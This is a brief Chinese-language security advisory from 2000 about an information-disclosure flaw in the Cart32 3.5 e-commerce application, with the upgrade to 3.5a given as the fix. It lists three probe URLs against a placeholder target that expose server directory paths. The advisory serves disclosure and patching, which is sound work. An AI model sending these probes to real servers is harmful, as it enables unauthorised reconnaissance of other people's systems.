McMurtrey/Whitaker & Associates Cart32存在目录被泄露问题发布时间:2000-11-11 更新时间:2000-11-11 严重程度:中 威胁程度:服务器信息泄露 错误类型:配置错误 利用方式:服务器模式 受影响系统 McMurtrey/Whitaker & Associates Cart32 3.5详细描述 Cart32是一个电子商务应用程序,其中存在一个漏洞可以泄露服务器信息,请求 一特殊的URL,可以泄露WINDOWS和PROGRAME FILE目录的信息。 测试代码 http://target/cgi-bin/cart32.exe/error http://target/cgi-bin/c32web.exe/ShowAdminDir http://target/cgi-bin/c32web.exe/CheckError?error=53 解决方案 使用McMurtrey/Whitaker & Associates Cart32 3.5a 相关信息 |
